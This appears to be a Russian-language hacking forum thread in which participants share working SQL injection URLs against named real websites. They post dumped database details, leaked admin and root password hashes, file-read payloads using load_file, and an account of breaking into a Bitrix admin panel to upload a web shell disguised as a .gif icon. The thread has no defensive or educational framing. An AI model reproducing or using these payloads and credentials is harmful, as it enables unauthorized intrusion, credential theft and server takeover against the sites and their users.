www.kruizmag.ru USER(): [email protected] DATABASE(): u51317_vbp VERSION(): 5.0.51-log Таблицы: adv_descr article article_g article_gt article_t banners boxes category category_descr compr compr_descr config config_g countries currency faq lang loadprice modules news news_descr nopt2prod noption_descr noptions orders place prod2cat product product_descr raspisanie security send_users sends static static_g static_gt static_t tbanners vitrina vitrina_prod voting voting_f
fromthetop.org pr-6 Version() - 5.0.45-community-nt file_priv = Y Сервак стоит на винде.... PHP: http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,load_file(char(67,58,47,98,111,111,116,46,105,110,105)),4,5,6,7+from+mysql.user/* PHP: http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,char(58),password),4,5,6,7+from+mysql.user/* root:*CF57A666D82A1A6E307947399943403DD93CF490 (sha1)
Choices.edu - PR 6 Coastal.edu - PR 5 4.. но ) rmatthe:363b122c528f54df4a0446b6bab05515 < j root:*70994C59F06C06BC6D7AE8284D7B3A0A707F8D67 смотрим бд.. ктот попробуйте залить шелл..) ато я убегаю..... чтот тип этого: Irhe.upenn.edu - PR 5 Apps.sais-jhu.edu
auction.ua http://auction.ua/sellitem/rpc.php?o=1957+union+select+1,concat(username,char (58),password),3+from+probid_admins/* auctionua:4c527675e9130ae3a6f0eea1fd9acfe5 http://auction.ua/sellitem/rpc.php?o=1957+union+select+1,concat(username,char(58),password),3+from+probid_users/*
Code: http://www.f1-world.ru/news/news.php3?idnews=-807061930+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20from%20INFORMATION_SCHEMA.TABLES%20limit%2052,1/* если не лень то можете продолжить вот те таблицы, которые я подобрал. Code: CHARACTER_SETS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS 1 2 3 4 a_settings articles cards cmess cusrs drvinfo drvyears fusers g10qwe g10users g12qwe g12teams g12users g15_parts g15_teams g20sessions g20users g20vopros g20vopros_old g21drivers g21sessions g21users images imagesections img2003 messages mg_news news news2001_2007 res2004 res2004m res2004com res2004drv самое интересно, что от сайта есть электронный магаз http://www.mirf1.ru/ на котором тож имеется дырочка Code: http://www.mirf1.ru/prview.php3?lnk=61&idp=1167' version() - 5.0.24 user() - f1world_rw@localhost database() - f1world
http://tehno.allmoskow.ru/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
http://kadabraabra.info/newslenta.php?men=4573+union+select+1,2,concat_ws(0x3a,table_name),4,5,6,7+from+information_schema.tables+limit+0,1-- скорость до сайта ужасная, раскручивать очень долго Х_х
http://www.etc-llibres.com/pg.php?id=1&ic=-1/**/union/**/select/**/concat(user(),char(0),database(),char(0),version()),2/* http://www.screenroom.co.uk/php/id.asp?id=1/**/or/**/1=(select%20db_name())-- http://www2.mat.dtu.dk/people/uk.php?id=-1/**/union/**/select/**/1,user()--
_http://ks.intercom.ru/news/?id=-75+union+select+1,2,3,version(),5,6/* version() - 4.0.17 user() - intercom@localhost database() - intercom
www.castlerockgc.co.uk pr 3 Code: http://www.castlerockgc.co.uk/index.php?id=-10/**/union/**/select/**/1,2,version(),4/* 4.1.22-standard
EDU Database Version: 4.0.20-max Database name: ae_webpage User name: webpage@localhost побрутил таблицы, ничего не брутанулось обычным словарем.
cms bitrixs http://www.romantrahtenberg.ru/ http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* Подобрать не получилось, (((
там 5 колонок Code: http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5/*
гы этж битрикс.... )) прева b_ , таблы login и пассворд _http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(login,char(59),password)+FROM+b_user+LIMIT+0,1)),0x71),0x71),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* Валим в админку .... и через смалики на форуме заливаемс элегантный шелленг: _http://www.romantrahtenberg.ru/bitrix/images/forum/icon/mod_abble.php.gif конфиги:
http://www.inderscience.com/ Database Version: 4.1.15-Debian_0.dotdeb.4-log Database name: papers User name: santiago@localhost [1]:root:01957ef668e6d197 [2]:root: [3]:debian-sys-maint:6b67408243591682 [4]:santiago:67988dfe49fa907a [5]:gringo:6b39e3a056217c98 [6]:idsonsusy:20cc5448310bcc55 [7]:webmaster:11e578da277c0f17 [8]:bizshoe:2bf7d9725ea14fce http://www.inderscience.com/mapper.php?id=31 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F7777772F617061636865322D64656661756C742F6874646F63732F696E6465782E706870),0x7873716C696E6A656E64),0x71),0x71) LIMIT 1,1/* - чтение сорсов. Google Page Rank - 7
http://chelzoo.ru/board_more.php?start=3296&rub=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),user())-- 4.0.27 chelzooru@localhost
